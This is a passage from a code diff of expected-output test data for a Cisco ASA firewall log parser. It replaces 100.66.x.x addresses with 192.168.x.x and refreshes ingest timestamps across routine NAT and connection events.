"ip": "192.168.98.44" }, "source": { "port": 1454, @@ -4305,7 +4305,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -4313,8 +4313,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721468Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267", + "ingested": "2021-12-09T13:34:28.099309800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4347,8 +4347,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4383,7 +4383,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4392,8 +4392,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721472200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", + "ingested": "2021-12-09T13:34:28.099315500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4409,7 +4409,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11780", "source_interface": "outside", "mapped_destination_port": 1454 @@ -4426,8 +4426,8 @@ }, "destination": { "port": 8268, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1455, 
@@ -4467,7 +4467,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4475,8 +4475,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721476400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268", + "ingested": "2021-12-09T13:34:28.099321300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4509,8 +4509,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4545,7 +4545,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4554,8 +4554,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721480800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", + "ingested": "2021-12-09T13:34:28.099327100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4571,7 +4571,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11781", "source_interface": "outside", "mapped_destination_port": 1455 
@@ -4588,8 +4588,8 @@ }, "destination": { "port": 8269, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1456, @@ -4629,7 +4629,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4637,8 +4637,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721485300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269", + "ingested": "2021-12-09T13:34:28.099332800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4671,8 +4671,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4707,7 +4707,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4716,8 +4716,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721489400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", + "ingested": "2021-12-09T13:34:28.099338600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -4733,7 +4733,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11782", "source_interface": "outside", "mapped_destination_port": 1456 @@ -4755,8 +4755,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -4791,7 +4791,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -4800,8 +4800,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721493600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099344300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -4817,7 +4817,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.4", + "mapped_source_ip": "192.168.100.4", "connection_id": "11783", "source_interface": "outside", "mapped_destination_port": 56132 @@ -4839,8 +4839,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -4875,7 +4875,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, 
@@ -4885,8 +4885,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721497600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:34:28.099350Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4918,8 +4918,8 @@ }, "destination": { "port": 8270, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1457, @@ -4959,7 +4959,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4967,8 +4967,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721501600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270", + "ingested": "2021-12-09T13:34:28.099355700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5001,8 +5001,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5037,7 +5037,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, 
@@ -5046,8 +5046,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721505800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", + "ingested": "2021-12-09T13:34:28.099361500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5063,7 +5063,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11784", "source_interface": "outside", "mapped_destination_port": 1457 @@ -5080,8 +5080,8 @@ }, "destination": { "port": 8271, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1458, @@ -5121,7 +5121,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5129,8 +5129,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721510Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271", + "ingested": "2021-12-09T13:34:28.099367200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5163,8 +5163,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" 
@@ -5199,7 +5199,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5208,8 +5208,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721515600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", + "ingested": "2021-12-09T13:34:28.099373Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5225,7 +5225,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11785", "source_interface": "outside", "mapped_destination_port": 1458 @@ -5247,8 +5247,8 @@ }, "source": { "port": 53, - "address": "100.66.1.107", - "ip": "100.66.1.107" + "address": "192.168.1.107", + "ip": "192.168.1.107" }, "tags": [ "preserve_original_event" @@ -5283,7 +5283,7 @@ "localhost" ], "ip": [ - "100.66.1.107", + "192.168.1.107", "172.31.98.44" ] }, @@ -5292,8 +5292,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721520Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:100.66.1.107/53 (100.66.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099378800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", 
@@ -5309,7 +5309,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.1.107", + "mapped_source_ip": "192.168.1.107", "connection_id": "11786", "source_interface": "outside", "mapped_destination_port": 56132 @@ -5331,8 +5331,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5367,7 +5367,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5378,8 +5378,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721524800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", + "ingested": "2021-12-09T13:34:28.099382900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -5411,8 +5411,8 @@ }, "destination": { "port": 8272, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1459, @@ -5452,7 +5452,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -5460,8 +5460,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721529300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272", + "ingested": "2021-12-09T13:34:28.099387500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5494,8 +5494,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5530,7 +5530,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5539,8 +5539,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721534200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", + "ingested": "2021-12-09T13:34:28.099392600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5556,7 +5556,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11787", "source_interface": "outside", "mapped_destination_port": 1459 @@ -5578,8 +5578,8 @@ }, "source": { "port": 53, - "address": "100.66.1.107", - "ip": "100.66.1.107" + "address": "192.168.1.107", + "ip": "192.168.1.107" }, "tags": [ "preserve_original_event" 
@@ -5614,7 +5614,7 @@ "localhost" ], "ip": [ - "100.66.1.107", + "192.168.1.107", "172.31.98.44" ] }, @@ -5624,8 +5624,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721538600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:100.66.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", + "ingested": "2021-12-09T13:34:28.099397400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -5657,8 +5657,8 @@ }, "destination": { "port": 8273, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1460, @@ -5698,7 +5698,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5706,8 +5706,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721543Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273", + "ingested": "2021-12-09T13:34:28.099403200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5740,8 +5740,8 @@ }, "source": { "port": 80, - "address": "100.66.192.44", - "ip": "100.66.192.44" + "address": "192.168.192.44", + "ip": "192.168.192.44" }, "tags": [ "preserve_original_event" @@ -5776,7 +5776,7 @@ "localhost" ], "ip": [ - "100.66.192.44", + "192.168.192.44", "172.31.98.44" ] }, 
@@ -5785,8 +5785,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721547400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:100.66.192.44/80 (100.66.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", + "ingested": "2021-12-09T13:34:28.099407500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5802,7 +5802,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.192.44", + "mapped_source_ip": "192.168.192.44", "connection_id": "11788", "source_interface": "outside", "mapped_destination_port": 1460 @@ -5840,8 +5840,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721551500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.099411800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -5866,8 +5866,8 @@ }, "destination": { "port": 8277, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1385, @@ -5907,7 +5907,7 @@ ], "ip": [ "172.31.156.80", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -5915,8 +5915,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721555600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:100.66.98.44/8277", + "ingested": "2021-12-09T13:34:28.099416200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5949,8 +5949,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -5985,7 +5985,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.156.80" ] }, @@ -5994,8 +5994,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721560300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:100.66.19.254/80 (100.66.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", + "ingested": "2021-12-09T13:34:28.099422100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -6011,7 +6011,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.156.80", - "mapped_source_ip": "100.66.19.254", + "mapped_source_ip": "192.168.19.254", "connection_id": "11797", "source_interface": "outside", "mapped_destination_port": 1385 
@@ -6049,8 +6049,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721565Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.099427800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6096,8 +6096,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721569600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.099433800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6143,8 +6143,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721574100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.099439600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -6190,8 +6190,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721578600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.099445400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6237,8 +6237,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721583400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.099451100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6284,8 +6284,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721588600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 duration 0:00:30", + "ingested": "2021-12-09T13:34:28.099456800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6315,8 +6315,8 @@ }, "source": { "port": 80, - "address": "100.66.115.46", - "ip": "100.66.115.46" + "address": "192.168.115.46", + "ip": "192.168.115.46" }, "tags": [ "preserve_original_event" 
@@ -6351,7 +6351,7 @@ "localhost" ], "ip": [ - "100.66.115.46", + "192.168.115.46", "172.31.156.80" ] }, @@ -6362,8 +6362,8 @@ "severity": 6, "duration": 325000000000, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721593100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", + "ingested": "2021-12-09T13:34:28.099462500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:29:31.000Z", @@ -6400,8 +6400,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6436,7 +6436,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.156.80" ] }, @@ -6447,8 +6447,8 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-09-07T12:21:32.721597800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", + "ingested": "2021-12-09T13:34:28.099468200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -6480,8 +6480,8 @@ }, "destination": { "port": 8278, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1386, 
@@ -6521,7 +6521,7 @@ ], "ip": [ "172.31.156.80", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -6529,8 +6529,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721603600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:100.66.98.44/8278", + "ingested": "2021-12-09T13:34:28.099490100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -6563,8 +6563,8 @@ }, "source": { "port": 80, - "address": "100.66.115.46", - "ip": "100.66.115.46" + "address": "192.168.115.46", + "ip": "192.168.115.46" }, "tags": [ "preserve_original_event" @@ -6599,7 +6599,7 @@ "localhost" ], "ip": [ - "100.66.115.46", + "192.168.115.46", "172.31.156.80" ] }, @@ -6608,8 +6608,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721608200Z", - 